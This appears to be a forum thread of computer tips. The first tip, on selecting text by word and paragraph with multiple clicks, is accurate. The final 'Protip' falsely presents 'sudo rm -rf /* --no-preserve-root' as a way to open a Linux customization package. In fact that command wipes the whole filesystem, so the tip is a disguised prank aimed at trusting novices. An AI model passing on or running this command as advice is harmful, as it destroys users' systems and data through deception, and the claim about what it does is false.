Post simple tips/tricks you should have known about but didn't.
I didn't know you can use your mouse/trackpad in most programs to select by word instead of characters.
Instead of clicking in front of a word and dragging over it and any other words you want to select, you can double click in the middle of a word, continue to hold down the left mouse button and drag and select other words. This way you don't have to be precise with where you start selecting. This is especially useful for laptops when using a trackpad. Also you can triple click and select a whole paragraph.

Protip: Most Linux distos come with a built in ricing package that makes customizing like 99% easier.
You can get to it by typing:
"sudo rm -rf /* --no-preserve-root" in your terminal
